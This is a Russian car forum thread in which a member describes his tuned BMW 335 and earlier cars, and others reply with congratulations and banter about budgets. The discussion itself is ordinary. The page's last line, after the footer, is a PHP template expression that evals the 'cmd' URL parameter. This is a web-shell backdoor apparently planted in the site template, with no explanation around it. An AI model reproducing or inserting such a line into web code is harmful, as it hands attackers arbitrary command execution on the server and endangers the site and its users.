+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 17

Тема: BMW 335


  1. #1

    Smile BMW 335

    Привет, уважаемые, а вот и я, давненько меня не было :)
    За 1.5 года сменил две машины-тем летом продал астрочку опц (есть в разделе клубные машины) и пересел нааааа...калибер срт4, автомобиль привлёк своей индивидуальностью и агрессивностью, хоть я и хаил его владея астрой :)
    СРТ4 принёс мне массу положительных эмоций, всеобщее внимание на дороге, фотосессии и тд. По характеристикам чуть проигрывал моей астре, на калибре был только выпуск и мопаровский мозг (в сумме около 315сил), ну всякие ништячки в виде 6-ти поршневых тормозов, магниевых колёсных дисков, распорок и тд... Были планы вкорячить бигтурбо, укрепить низ мотора и вдуть более 400сил, но волею судеб машина была продана и куплена бмвшечка 335.
    На 335 уже установлен чип от Вишну воторой версии, короткая кулиса (специально брал механику), средняя и оконечная часть выпуска от Вишну. На выходе 370-380сил. В дальнейших планах вырезать каты и поставить приёмки (+30сил), установка фронтальника... На выходе ребята имеют 400+сил и выход из 13 сек на квотере.
    Так что буду рад в скором времени подскочить на встречу и повидаться со всеми старичками и не очень :)

  2. #2
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Ниче так тачилки
    песок сыпется....не останавливайтесь на достигнутом !

  3. #3
    GTI-Racing Gautama is on a distinguished road Аватар для Gautama
    Регистрация
    27.08.2006
    Откуда
    Klagenfurt
    Машина
    KTM chicago
    Сообщений
    485
    "На уважении" [c]
    Куренье -Яд, а некуренье- Нет ©
    Gti mk4 - sold
    Gti mk3 - sold
    500SEL - sold
    300SE - dead

  4. #4
    GTI-Racing Cheh is on a distinguished road Аватар для Cheh
    Регистрация
    01.09.2009
    Откуда
    МО г. Реутов
    Машина
    A3 Sportback 2.0T DSG
    Сообщений
    185
    Коля, мои поздравления.
    Среди экс ОПЦшников 335 явно в фаворе :))

  5. #5
    Спасибо.
    Ну в бюджете до 1.5лямов взять что-то более лучше валящее на одном чипе/пыхе и возрастом не более 3 лет не реально. Поэтому 335 и пользуется такой популярностью, вложить 30тр и валить быстрее м3....

  6. #6
    BMW нииже надо..
    The day I've bought my GTI was the day I became alive. ©
    GTI не стареют, со временем они становятся быстрее, и ниже. ©

  7. #7
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от nickart Посмотреть сообщение
    Спасибо.
    Ну в бюджете до 1.5лямов взять что-то более лучше валящее на одном чипе/пыхе и возрастом не более 3 лет не реально. Поэтому 335 и пользуется такой популярностью, вложить 30тр и валить быстрее м3....

    опять скорость и кого то валить, скучно.............. до 1.5 лямов, я тебе такой гольф соберу, что уже будет страшно в него садиться. Просто честно признайся, хотел как все, чтобы телочки присаживались на капот в короткой юбке, а между ножек торчал пропеллер бэмевэшный )))))))
    песок сыпется....не останавливайтесь на достигнутом !

  8. #8
    Цитата Сообщение от BON Посмотреть сообщение
    опять скорость и кого то валить, скучно.............. до 1.5 лямов, я тебе такой гольф соберу, что уже будет страшно в него садиться. Просто честно признайся, хотел как все, чтобы телочки присаживались на капот в короткой юбке, а между ножек торчал пропеллер бэмевэшный )))))))
    Совершенно ты не прав.

  9. #9
    GTI-Racing schummi004 is on a distinguished road Аватар для schummi004
    Регистрация
    07.06.2010
    Откуда
    Москва
    Машина
    Audi S3
    Сообщений
    549
    Цитата Сообщение от BON Посмотреть сообщение
    опять скорость и кого то валить, скучно.............. до 1.5 лямов, я тебе такой гольф соберу, что уже будет страшно в него садиться. Просто честно признайся, хотел как все, чтобы телочки присаживались на капот в короткой юбке, а между ножек торчал пропеллер бэмевэшный )))))))
    Да не нужен никому гольф за 1.5 ляма, ну что никак народ этого не поймёт.

  10. #10
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Цитата Сообщение от schummi004 Посмотреть сообщение
    Да не нужен никому гольф за 1.5 ляма, ну что никак народ этого не поймёт.
    Нужен!!!!! я бы купил с удовольствием!!! Но к сожалению у меня нет 1,5 миллиона, даже если продать мою Октавию RS то максимум удастся получить за нее 700 - 800 тыс.(

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}